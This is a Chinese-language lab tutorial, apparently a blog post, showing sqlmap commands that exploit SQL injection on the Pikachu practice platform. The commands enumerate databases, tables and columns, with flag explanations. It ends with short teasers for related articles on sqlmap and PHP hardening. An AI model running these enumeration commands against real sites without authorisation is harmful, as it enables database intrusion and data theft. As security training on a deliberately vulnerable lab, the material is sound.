sqlmap是乙個自動化的sql注入工具,其主要功能是掃瞄,發現並利用給定的url的sql注入漏洞1.安裝
2.實驗
在pikachu實驗平台數字型注入中抓包,記錄鏈結以及提交給伺服器的引數
讀取資料庫
在cmd中進入sqlmap的安裝目錄,輸入命令
python sqlmap.py -u "" --data="id=5&submit=%e6%9f%a5%e8%af%a2" - f --dbms mysql --dbs --batch
//-u 後面接測試鏈結
// -data 提交給伺服器的資料
//--dbms 資料庫型別為myslq資料庫
//--dbs 列出所有的資料庫
//--batch 該引數使用後不需要使用者輸入,預設提示走下去
成功獲取到資料庫名
讀取表名
python sqlmap.py -u "" --data="id=5&submit=%e6%9f%a5%e8%af%a2" --dbms mysql -d pikachu --tables --batch
//-d指定資料庫
//--tables獲取資料庫中的表
成功獲取表
讀取列
python sqlmap.py -u "" --data="id=5&submit=%e6%9f%a5%e8%af%a2" --dbms mysql -d pikachu -t users --columns --batch
//-d pikachu 指定資料庫
//-t users 指定表名
//--columns 顯式列
成功獲取列
Web安全入門 sqlmap
列舉一下sqlmap簡單命令和相對應的功能 檢測注入點 sqlmap.py u 目標url 檢測有哪些資料庫 sqlmap.py u 目標url dbs 檢測當前使用的哪個資料庫 sqlmap.py u 目標url current db 檢測當前使用者 sqlmap.py u 目標url curre...
資訊保安 安全加固
為了防止黑客獲取伺服器中 php 版本資訊,如x powered by php 5.3.7,最好關閉顯示 php 版本資訊,在配置檔案中追加以下資訊 expose php off預設情況下,php錯誤資訊會將程式出錯的原因顯示到瀏覽器上,容易造成敏感資訊洩露。關閉錯誤顯示 display error...
安全基礎 什麼是資訊保安?資訊保安怎麼防護?
安全基礎 什麼是資訊保安?資訊保安怎麼防護?1 資訊保安指的是保護可用資訊或資訊資源不會受到未授權訪問 攻擊 盜竊 或資料損壞等的威脅 2 資料 在計算機系統中,檔案就是資料 3 資源是指虛擬或物理系統元件,物理資源是指任何直接連線到計算機系統中的裝置,虛擬資源是指檔案型別 記憶體位置 或網路連線 ...